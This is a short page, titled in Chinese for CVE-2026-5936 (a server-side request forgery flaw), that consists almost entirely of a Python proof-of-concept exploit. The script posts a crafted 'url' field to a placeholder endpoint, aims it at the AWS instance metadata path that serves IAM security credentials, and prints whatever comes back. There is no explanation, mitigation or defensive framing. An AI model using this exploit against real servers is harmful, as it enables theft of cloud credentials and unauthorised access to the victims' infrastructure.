CVE-2026-5936 服务器端请求伪造漏洞

import requests def exploit_ssrf(target_url, malicious_url): """ PoC for CVE-2026-5936 This script sends a crafted URL to the vulnerable endpoint to trigger an SSRF. """ # Example payload targeting internal metadata service payload = { "url": malicious_url } try: print(f"[*] Sending request to {target_url} with payload: {malicious_url}") response = requests.post(target_url, data=payload, timeout=5) if response.status_code == 200: print("[+] Request successful!") print("[+] Response content:") print(response.text) else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Replace with the actual vulnerable endpoint target = "http://vulnerable-site.com/api/fetch" # Common internal metadata service IP (AWS) internal_target = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" exploit_ssrf(target, internal_target)